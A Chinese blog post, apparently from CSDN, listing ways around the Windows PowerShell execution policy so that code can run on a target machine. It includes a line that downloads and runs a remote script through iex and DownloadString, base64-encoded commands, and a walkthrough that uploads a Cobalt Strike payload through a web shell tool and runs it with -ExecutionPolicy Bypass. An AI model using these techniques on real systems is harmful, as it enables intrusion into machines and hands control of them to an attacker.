PowerShell禁止执行策略绕过实践

最新推荐文章于 2024-05-30 10:02:02 发布
最新推荐文章于 2024-05-30 10:02:02 发布
阅读量2.4k 收藏 10
点赞数 1
分类专栏: 内网相关 文章标签: powershell 安全漏洞 信息安全 windows shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/awindog/article/details/104437631
版权

在Windows中,为了防止使用者允许恶意脚本,PowerShell提供了一个执行策略,在默认情况下这个策略为不能运行。
那我们如何指导运行规则呢?
cmd中执行 powershell Get-ExecutionPolicy
Get-ExecutionPolicy
这里为Restricted,那其实相关的策略有:

策略描述
Restricted默认设置。在任何条件下,都不允许PowerShell脚本运行
AllSigned只有数字签名的脚本(包括配置文件脚本)将会运行,此外,会提示你允许运行那些使用指定的证书签名的脚本
RemoteSigned经本地编写的脚本将会运行。从网络下载的脚本运行,除非他们签名了并且你批准了的签名的证书
UnRestricted所有的脚本都将运行,但是,对于下载的脚本会警告你,而且,它们运行前必须批准
ByPass任何脚本都将运行,而且不管其来源。这是一个潜在的非常危险的设置,只有在非常特定的情况下才使用;其中,其他的安全性系统已经准备好了,可以防止流氓脚本未经你的许可而运行
Undefined如果没有认为的设置过主机的PowerShell脚本执行策略。默认是Restricted,禁止所有脚本运行

如果是正常用户,能够直接设置powershell执行权限,可以用Set-ExecutionPolicy进行设置,将ExecutionPolicy改为Unrestricted,可以运行未签名的脚本
Set-ExecutionPolicy Unrestricted
效果如下
设置效果大小写好像也不重要
大小写效果但是很多时候,我们并不是用户,就需要去绕过限制禁止执行的限制,在目标机器上执行我们想要执行的PowerShell代码

然后就测试了一些方法,以下几种实用比较容易,也确实都可以

1.直接在控制台输入

不写入磁盘。不会导致任何配置更改。
直接输入

2.从文件中读取脚本并通过PowerShell的标准输入

powershell Get-Content test.ps1 | PowerShell.exe -noprofile -
Get-Content powershell GC test.ps1 | PowerShell.exe -noprofile -
GCpowershell type test.ps1 | PowerShell.exe -noprofile -
type同理,可以使用echo把内容传递过去,类似linux下。
不写入磁盘。不会导致任何配置更改。
powershell Echo 'Write-Host "My voice is my passport, verify me." '| PowerShell.exe -noprofile -
echo

3.下载的方式

从网上下载PowerShell脚本并执行。
不写入磁盘。不会导致任何配置更改。
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.159.134/pstest')"
网页信息下载执行

4.command

不写入磁盘。不会导致任何配置更改。
Powershell -command "Write-Host 'hello world'"
Powershell -c "Write-Host 'hello world'"
command

5.EncodeCommand

不写入磁盘。不会导致任何配置更改。
在powershell中执行如下命令
$command = "Write-Host 'hello world'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand
EncodeCommand或者拿到编码后的信息,再运行
powershell.exe -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgA CcAaABlAGwAbABvACAAdwBvAHIAbABkACcA
EncodedCommand
-EncodedCommand参数可以简写为-Enc
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcAaABlAGwA bABvACAAdwBvAHIAbABkACcA
Enc

6.Invoke-Command

不写入磁盘。不会导致任何配置更改。
powershell invoke-command -scriptblock {Write-Host "hello world"}
Invoke-Command

7.ByPass

不写入磁盘。不会导致任何配置更改。
PowerShell.exe -ExecutionPolicy UnRestricted -File test.ps1
ByPass这里应该是用某种策略执行脚本,所以比如下载的,可以用RemoteSigned来生效

实践

最后再来进行cs shell上线测试
生成powershell脚本,然后蚁剑上传
直接执行自然不行,powershell ./payload执行下,报如下信息
禁止执行所以要绕过执行限制
PowerShell.exe -ExecutionPolicy Bypass -File payload.ps1
绕过执行限制成功上线
成功上线
以上这些都是测试过的,我测试的机子是win7,有兴趣的可以试试。

参考链接:https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

awindog
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
绕过PowerShell执行策略的方法总结
weixin_41082546的博客
06-20 949
默认情况下,PowerShell配置为阻止Windows系统上执行PowerShell脚本。对于渗透测试人员,系统管理员和开发人员而言,这可能是一个障碍,但并非必须如此。 什么是PowerShell执行策略PowerShell execution policy 是用来决定哪些类型的PowerShell脚本可以在系统中运行。默认情况下,它是“Restricted”(限制)的。然而,这个设置从来没有算是一种安全控制。相反,它会阻碍管理员操作。这就是为什么我们有这么多绕过它的方法。 为什么我..
选择和设置PowerShell执行策略
culuo4781的博客
07-24 3316
The PowerShell execution policy was developed with a vision to be friendly to administrators, and at the same time, be accessible to end users. More than the former, the latter goal was a little c...
我的powershell免杀之路
mingyqf的博客
05-17 1918
我的powershell免杀之路 ​ 原创 tubai
全面绕过:深入探索FullBypass——PowerShell安全研究的利器
最新发布
gitblog_00074的博客
05-30 384
全面绕过:深入探索FullBypass——PowerShell安全研究的利器 项目地址:https://gitcode.com/Sh3lldon/FullBypass 在网络安全与攻防的世界里,每一项技术的出现都可能成为对决中的关键。今天,我们将一同揭开【FullBypass】的神秘面纱,一个专为技术研究人员设计,用于规避AMSI(反恶意软件扫描接口)和PowerShell CLM(受限制语言模式...
powershell绕过执行策略
good good study
02-24 1722
PowerShell是为系统管理员设计的基于任务的自动化命令行外壳(Shell)和相关脚本环境。 它建立在.NET框架上。 它是比命令提示符(cmd)强大的命令行解释器,可以解释PowerShell和批处理命令。 powershell一直都是内网渗透的大热门,微软是真正的在推行PowerShell,包括Office等更多自家软件,底层都是调用PowerShell来实现,近年来利用powershell来搞内网渗透进行横向或免杀的热度一直居高不下。 posershell历史:PowerShell历史
PowerShell:系统中禁止执行脚本 解决方法
10-27 329
解决方法: 以管理员身份打开PowerShell 输入set-executionpolicy remotesigned
PowerShell禁止脚本运行的解决办法
想到哪记到哪
04-19 790
PowerShell报错:因为在此系统上禁止运行脚本。有关详细信息,请参阅 https:/go.microsoft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies。 英语好的,直接阅读,按照参阅地址应该就可以解决问题了。 查看当前状态,powershell执行如下命令: Get-ExecutionPolicy 显示Restrict...
Powershell执行命令时提示“禁止执行脚本”的解决办法
奋斗鱼
06-21 587
有时 在powershell执行命令 会出现提示“禁止执行脚本”的提示,需要进行以下操作。 1.以管理员身份运行power shell 2.获取当前会话的执行策略 get-ExecutionPolicy 3.设定执行政策: Set-ExecutionPolicy -ExecutionPolicy RemoteSigned 4.执行以上操作完成后,即可正常运行命令不会再有禁止提示了。 ...
PowerShell提示系统禁止执行脚本解决方法
学会简单的博客
07-10 3151
Powershell直接运行脚本时会出现:无法加载文件 **.ps1,因为在此系统中禁止执行脚本。 解决办法: 首次在计算机上启动 Windows PowerShell 时,现用执行策略很可能是 Restricted(默认设置)。Restricted 策略不允许任何脚本运行。若要了解计算机上的现用执行策略,请键入:get-executionpolicy 若要在本地计算机上运行您编写的未签名脚本
绕过PowerShell执行策略的15种方法
iteye_16188的博客
01-28 223
[url]https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/[/url]
PowerShell执行策略:确保脚本安全执行的关键
常备不懈
02-26 1177
PowerShell 执行策略不是强制性的访问控制措施,而是旨在防止未经授权的脚本执行。通过限制脚本执行,它们帮助防止攻击者利用 PowerShell 脚本进行恶意活动。执行策略有多个级别,可以通过命令进行设置。
PowerShell因为在此系统中禁止执行脚本解决方法
idweiwei的博客
10-28 392
Powershell直接脚本时会出现: 无法加载文件 ******.ps1,因为在此系统中禁止执行脚本。有关详细信息,请参阅 "get-help about_signing"。 所在位置 行:1 字符: 17 + E:\Test\test.ps1 <<<< + CategoryInfo : NotSpecified: (:) [], PSSe...
哪些方法可以绕过PowerShell Execution Policy?
dnqykgfmq169340687的博客
07-11 102
哪些方法可以绕过PowerShell Execution Policy? 转: https://blog.csdn.net/qq_27446553/article/details/50577296 转载于:https://www.cnblogs.com/CoBrAMG/p/9293854.html
Powershell禁止运行脚本(about_Execution_Policies)的解决方法
m0_57982594的博客
03-14 1274
Powershell禁止运行脚本(about_Execution_Policies)的解决方法;无法将“node.exe”项识别为 cmdlet、函数、脚本文件或可运行程序的名称
powershell执行策略绕过
https://www.cnblogs.com/zpchcbd/
09-12 3082
执行脚本的时候 你可能会在调用的时候出现报错,这是powershell的安全执行策略,下面我们来了解一下执行策略PowerShell 提供了 Restricted、AllSigned、RemoteSigned、Unrestricted、Bypass、Undefined 六种类型的执行策略简单介绍各种策略如下: 名称与说明: Restricted 受限制的,可以执行单个的命令,但是不能执行...
PowerShell 的安全性
Kali与编程
03-11 902
为了保护系统和数据的安全,管理员可以通过设置 Execution Policy、启用 Constrained Language Mode、启用 Script Block Logging 和 Transcription Logging、使用 JEA 和启用 Enhanced Protection Mode 等安全配置选项来保护系统和数据。Script Block Logging:PowerShell 的 Script Block Logging 可以记录所有执行脚本块,包括输入、输出和执行时间等信息。
渗透之——PowerShell基本命令和绕过权限执行
冰河的专栏
01-07 5805
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86029412 一、基本命令 以文件操作为例 1.新建目录 New-Item whitecellclub-ItemType Directory 2.新建文件 New-Item light.txt-ItemType File 3.删除目录 Remove-Item...
PowerShell:因为在此系统上禁止运行脚本,解决方法
白菜的博客
05-08 562
在自己编PowerShell脚本的时候突然遇到这个问题: 无法加载文件 C:\Users\DH\Desktop\cs\rename.ps1,因为在此系统上禁止运行脚本。有关详细信息,请参阅 https:/go.microsoft.com/fwlink/?LinkID=135170 中的 about_Execution_Policies。 + CategoryInfo : SecurityError: (:) [],ParentContainsErrorRecordException + FullyQual
【避坑】PowerShell:因为在此系统上禁止运行脚本 附原因和解决办法
qq_44831027的博客
07-01 6391
现象: 用powershell作为命令行工具,尝试使用thinkjs,安装完think-cli后检测运行版本(thinkjs -V)时,遇到了以后问题: 快速解决: 通过管理员模式打开powershell,然后输入: set-executionpolicy RemoteSigned 然后输入A全是,等待运行即可。 (不需要深入了解到此为止,不用看下文) 原因: 当前powershell执行策略无法运行脚本 powershell有四种执行策略: Restricted 禁止运行任何脚本和配置文件(默认
power shell执行策略(ExecutionPolicy)
热门推荐
苦笔的博客
11-12 2万+
#更新执行策略 Set-ExecutionPolicy <policy-name>#policy-name可能的值 Unrestricted、RemoteSigned、AllSigned、Restricted、Default、Bypass、Undefined#将ExecutionPolicy改为Unrestricted,可以运行未签名的脚本 Set-ExecutionPolicy Unrestric

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值